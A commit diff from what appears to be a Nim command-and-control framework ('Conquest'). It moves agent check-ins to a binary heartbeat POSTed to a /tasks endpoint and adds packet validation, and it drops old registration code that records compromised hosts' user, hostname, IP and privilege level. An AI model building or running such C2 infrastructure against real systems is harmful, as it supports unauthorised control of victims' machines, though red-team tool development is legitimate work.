Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs
This commit is contained in:
@@ -39,29 +39,36 @@ proc register*(registrationData: seq[byte]): bool =
|
||||
|
||||
return true
|
||||
|
||||
proc getTasks*(listener, agent: string): seq[seq[byte]] =
|
||||
proc getTasks*(checkinData: seq[byte]): seq[seq[byte]] =
|
||||
|
||||
{.cast(gcsafe).}:
|
||||
|
||||
# Deserialize checkin request to obtain agentId and listenerId
|
||||
let
|
||||
request: Heartbeat = deserializeHeartbeat(checkinData)
|
||||
agentId = uuidToString(request.agentId)
|
||||
listenerId = uuidToString(request.listenerId)
|
||||
timestamp = request.timestamp
|
||||
|
||||
var result: seq[seq[byte]]
|
||||
|
||||
# Check if listener exists
|
||||
if not cq.dbListenerExists(listener.toUpperAscii):
|
||||
cq.writeLine(fgRed, styleBright, fmt"[-] Task-retrieval request made to non-existent listener: {listener}.", "\n")
|
||||
if not cq.dbListenerExists(listenerId):
|
||||
cq.writeLine(fgRed, styleBright, fmt"[-] Task-retrieval request made to non-existent listener: {listenerId}.", "\n")
|
||||
raise newException(ValueError, "Invalid listener.")
|
||||
|
||||
# Check if agent exists
|
||||
if not cq.dbAgentExists(agent.toUpperAscii):
|
||||
cq.writeLine(fgRed, styleBright, fmt"[-] Task-retrieval request made to non-existent agent: {agent}.", "\n")
|
||||
if not cq.dbAgentExists(agentId):
|
||||
cq.writeLine(fgRed, styleBright, fmt"[-] Task-retrieval request made to non-existent agent: {agentId}.", "\n")
|
||||
raise newException(ValueError, "Invalid agent.")
|
||||
|
||||
# Update the last check-in date for the accessed agent
|
||||
cq.agents[agent.toUpperAscii].latestCheckin = now()
|
||||
cq.agents[agentId].latestCheckin = cast[int64](timestamp).fromUnix().local()
|
||||
# if not cq.dbUpdateCheckin(agent.toUpperAscii, now().format("dd-MM-yyyy HH:mm:ss")):
|
||||
# return nil
|
||||
|
||||
# Return tasks
|
||||
for task in cq.agents[agent.toUpperAscii].tasks:
|
||||
for task in cq.agents[agentId].tasks:
|
||||
let taskData = serializeTask(task)
|
||||
result.add(taskData)
|
||||
|
||||
|
||||
@@ -22,66 +22,26 @@ proc register*(ctx: Context) {.async.} =
|
||||
|
||||
try:
|
||||
let agentId = register(ctx.request.body.toBytes())
|
||||
resp "Ok", Http200
|
||||
resp "", Http200
|
||||
|
||||
except CatchableError:
|
||||
resp "", Http404
|
||||
|
||||
# try:
|
||||
# let
|
||||
# postData: JsonNode = parseJson(ctx.request.body)
|
||||
# agentRegistrationData: AgentRegistrationData = postData.to(AgentRegistrationData)
|
||||
# agentUuid: string = generateUUID()
|
||||
# listenerUuid: string = ctx.getPathParams("listener")
|
||||
# date: DateTime = now()
|
||||
|
||||
# let agent: Agent = Agent(
|
||||
# name: agentUuid,
|
||||
# listener: listenerUuid,
|
||||
# username: agentRegistrationData.username,
|
||||
# hostname: agentRegistrationData.hostname,
|
||||
# domain: agentRegistrationData.domain,
|
||||
# process: agentRegistrationData.process,
|
||||
# pid: agentRegistrationData.pid,
|
||||
# ip: agentRegistrationData.ip,
|
||||
# os: agentRegistrationData.os,
|
||||
# elevated: agentRegistrationData.elevated,
|
||||
# sleep: agentRegistrationData.sleep,
|
||||
# jitter: 0.2,
|
||||
# tasks: @[],
|
||||
# firstCheckin: date,
|
||||
# latestCheckin: date
|
||||
# )
|
||||
|
||||
# # Fully register agent and add it to database
|
||||
# if not agent.register():
|
||||
# # Either the listener the agent tries to connect to does not exist in the database, or the insertion of the agent failed
|
||||
# # Return a 404 error code either way
|
||||
# resp "", Http404
|
||||
# return
|
||||
|
||||
# # If registration is successful, the agent receives it's UUID, which is then used to poll for tasks and post results
|
||||
# resp agent.name
|
||||
|
||||
# except CatchableError:
|
||||
# # JSON data is invalid or does not match the expected format (described above)
|
||||
# resp "", Http404
|
||||
|
||||
# return
|
||||
|
||||
#[
|
||||
GET /{listener-uuid}/{agent-uuid}/tasks
|
||||
POST /tasks
|
||||
Called from agent to check for new tasks
|
||||
]#
|
||||
proc getTasks*(ctx: Context) {.async.} =
|
||||
|
||||
let
|
||||
listener = ctx.getPathParams("listener")
|
||||
agent = ctx.getPathParams("agent")
|
||||
|
||||
|
||||
# Check headers
|
||||
# If POST data is not binary data, return 404 error code
|
||||
if ctx.request.contentType != "application/octet-stream":
|
||||
resp "", Http404
|
||||
return
|
||||
|
||||
try:
|
||||
var response: seq[byte]
|
||||
let tasks: seq[seq[byte]] = getTasks(listener, agent)
|
||||
let tasks: seq[seq[byte]] = getTasks(ctx.request.body.toBytes())
|
||||
|
||||
if tasks.len <= 0:
|
||||
resp "", Http200
|
||||
@@ -89,7 +49,7 @@ proc getTasks*(ctx: Context) {.async.} =
|
||||
|
||||
# Create response, containing number of tasks, as well as length and content of each task
|
||||
# This makes it easier for the agent to parse the tasks
|
||||
response.add(uint8(tasks.len))
|
||||
response.add(cast[uint8](tasks.len))
|
||||
|
||||
for task in tasks:
|
||||
response.add(uint32(task.len).toBytes())
|
||||
|
||||
@@ -67,7 +67,7 @@ proc listenerStart*(cq: Conquest, host: string, portStr: string) =
|
||||
|
||||
# Define API endpoints
|
||||
listener.post("register", routes.register)
|
||||
listener.get("{listener}/{agent}/tasks", routes.getTasks)
|
||||
listener.post("tasks", routes.getTasks)
|
||||
listener.post("results", routes.postResults)
|
||||
listener.registerErrorHandler(Http404, routes.error404)
|
||||
|
||||
@@ -100,7 +100,7 @@ proc restartListeners*(cq: Conquest) =
|
||||
|
||||
# Define API endpoints
|
||||
listener.post("register", routes.register)
|
||||
listener.get("{listener}/{agent}/tasks", routes.getTasks)
|
||||
listener.post("tasks", routes.getTasks)
|
||||
listener.post("results", routes.postResults)
|
||||
listener.registerErrorHandler(Http404, routes.error404)
|
||||
|
||||
|
||||
@@ -60,6 +60,9 @@ proc deserializeTaskResult*(resultData: seq[byte]): TaskResult =
|
||||
if magic != MAGIC:
|
||||
raise newException(CatchableError, "Invalid magic bytes.")
|
||||
|
||||
if packetType != cast[uint8](MSG_RESPONSE):
|
||||
raise newException(CatchableError, "Invalid packet type for task result, expected MSG_RESPONSE.")
|
||||
|
||||
# TODO: Validate sequence number
|
||||
|
||||
# TODO: Validate HMAC
|
||||
@@ -120,6 +123,9 @@ proc deserializeNewAgent*(data: seq[byte]): Agent =
|
||||
if magic != MAGIC:
|
||||
raise newException(CatchableError, "Invalid magic bytes.")
|
||||
|
||||
if packetType != cast[uint8](MSG_REGISTER):
|
||||
raise newException(CatchableError, "Invalid packet type for agent registration, expected MSG_REGISTER.")
|
||||
|
||||
# TODO: Validate sequence number
|
||||
|
||||
# TODO: Validate HMAC
|
||||
@@ -158,5 +164,48 @@ proc deserializeNewAgent*(data: seq[byte]): Agent =
|
||||
latestCheckin: now()
|
||||
)
|
||||
|
||||
proc deserializeHeartbeat*(data: seq[byte]): Heartbeat =
|
||||
|
||||
|
||||
var unpacker = initUnpacker(data.toString)
|
||||
|
||||
let
|
||||
magic = unpacker.getUint32()
|
||||
version = unpacker.getUint8()
|
||||
packetType = unpacker.getUint8()
|
||||
flags = unpacker.getUint16()
|
||||
seqNr = unpacker.getUint32()
|
||||
size = unpacker.getUint32()
|
||||
hmacBytes = unpacker.getBytes(16)
|
||||
|
||||
# Explicit conversion from seq[byte] to array[16, byte]
|
||||
var hmac: array[16, byte]
|
||||
copyMem(hmac.addr, hmacBytes[0].unsafeAddr, 16)
|
||||
|
||||
# Packet Validation
|
||||
if magic != MAGIC:
|
||||
raise newException(CatchableError, "Invalid magic bytes.")
|
||||
|
||||
if packetType != cast[uint8](MSG_HEARTBEAT):
|
||||
raise newException(CatchableError, "Invalid packet type for checkin request, expected MSG_HEARTBEAT.")
|
||||
|
||||
# TODO: Validate sequence number
|
||||
|
||||
# TODO: Validate HMAC
|
||||
|
||||
# TODO: Decrypt payload
|
||||
# let payload = unpacker.getBytes(size)
|
||||
|
||||
return Heartbeat(
|
||||
header: Header(
|
||||
magic: magic,
|
||||
version: version,
|
||||
packetType: packetType,
|
||||
flags: flags,
|
||||
seqNr: seqNr,
|
||||
size: size,
|
||||
hmac: hmac
|
||||
),
|
||||
agentId: unpacker.getUint32(),
|
||||
listenerId: unpacker.getUint32(),
|
||||
timestamp: unpacker.getUint32()
|
||||
)
|
||||
Reference in New Issue
Block a user